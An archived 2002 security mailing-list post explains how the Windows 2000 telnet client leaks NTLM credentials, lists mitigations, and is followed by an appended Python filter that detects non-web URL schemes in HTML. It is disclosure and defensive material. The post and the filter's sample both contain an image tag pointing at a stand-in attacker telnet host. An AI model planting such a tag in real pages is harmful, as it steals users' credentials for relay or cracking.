Re: [fw-wiz] Danger of telnet on w2k (Was: re: Annoying pop-ups)
From: Mikael Olsson (mikael.olsson@clavister.com)
Date: 10/30/02
- Next message: Elizabeth Zwicky: "RE: [fw-wiz] sunscreen vs netbios"
- Previous message: Alex Ongena: "[fw-wiz] Dynamic execution of a script on arrival of a packet"
- In reply to: Mikael Olsson: "Re: [fw-wiz] Annoying pop-ups"
- Next in thread: John Adams: "Re: [fw-wiz] Annoying pop-ups"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: Mikael Olsson <mikael.olsson@clavister.com>
To: firewall-wizards@honor.icsalabs.com
Date: Wed Oct 30 14:20:02 2002
Mikael Olsson wrote:
>
> PLUS port 23 (Telnet!)
> Sure, it isn't on by default, but people found ways to abuse DCOM to
> turn it on remotely. Uh oh.
I just figured that this deserved a bit of extra mention. I'm sure that
most people think "Bah. I've got a good admin password, and I don't log
on via telnet anyway, so I'm safe".
If so, here's something you need to know: Microsoft embedded NTLM auth
in telnet in w2k. This means that, unless instructed to do otherwise,
the w2k telnet client will send out NTLM authentication data of the
currently logged on user whenever you telnet to an NTLM-enabled server.
This same data sent out can be relayed back to your box and used
to log on to you without delay. It can also be fed to l0phtcrack.
Microsoft did indeed send out an advisory about this two years ago,
but I figured it deserved another mention, seeing as how people still
tend to forget about this. All it needs is an image tag like
<img src="telnet://evilserver.int:2323">
Stuff that can help:
- Read http://www.microsoft.com/technet/security/bulletin/MS00-067.asp
and install patch. The patch is to display a warning before NTLM
is sent to stuff outside the local zone. However, we have seen the zone
schemes be subverted before, so don't rely on it.
- Block port 23 inbound to avoid the direct relay back to your telnet
port. Disabling the telnet service might be a good idea, but don't
rely on it.
- Run "telnet" without arguments. Type "unset ntlm".
This prevents the telnet client from sending ntlm hashes at all.
- Blocking port 23 outbound will NOT help.
--
Mikael Olsson, Clavister AB
Storgatan 12, Box 393, SE-891 28 ÖRNSKÖLDSVIK, Sweden
Phone: +46 (0)660 29 92 00 Mobile: +46 (0)70 26 222 05
Fax: +46 (0)660 122 50 WWW: http://www.clavister.com
Learn to count in Swedish! "ett, två, tre, fyra, fem, sex, sju ..."
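As an added illustration (not part of Mikael's message): a content filter, of the kind a mail gateway or web proxy could run, that flags HTML embedding telnet:// or any other non-web scheme in tags a browser fetches without a click. The tag set, the scheme allowlist and the sample page are assumptions made for this example.

```python
"""Flag HTML that auto-fetches non-web URLs such as telnet://.

Added example for the post above; the tag set and allowed schemes
are assumptions, not a published filter.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tags a browser fetches automatically; <a href> needs a click, so it is
# not in this set on purpose.
AUTO_FETCH_TAGS = {"img", "iframe", "frame", "script", "link", "embed", "object"}
ALLOWED_SCHEMES = {"http", "https", "data", ""}  # "" means a relative URL


class _SrcCollector(HTMLParser):
    """Collect (tag, url) for every auto-fetched reference in the page."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        if tag not in AUTO_FETCH_TAGS:
            return
        for name, value in attrs:
            if name in ("src", "href", "data") and value:
                self.refs.append((tag, value.strip()))


def find_unsafe_refs(html):
    """Return (tag, url, scheme) for auto-fetched URLs whose scheme is not allowed."""
    parser = _SrcCollector()
    parser.feed(html)
    parser.close()
    hits = []
    for tag, url in parser.refs:
        scheme = urlsplit(url).scheme.lower()
        if scheme not in ALLOWED_SCHEMES:
            hits.append((tag, url, scheme))
    return hits


# Constructed sample page: one harmless image plus the telnet:// image tag
# from the post; the <a href> is left alone because it requires a click.
SAMPLE = ('<html><body><img src="http://example.invalid/a.gif">'
          '<img src="telnet://evilserver.int:2323">'
          '<a href="telnet://x">click</a></body></html>')

if __name__ == "__main__":
    for tag, url, scheme in find_unsafe_refs(SAMPLE):
        print(f"blocked: <{tag}> references {url} (scheme {scheme})")
```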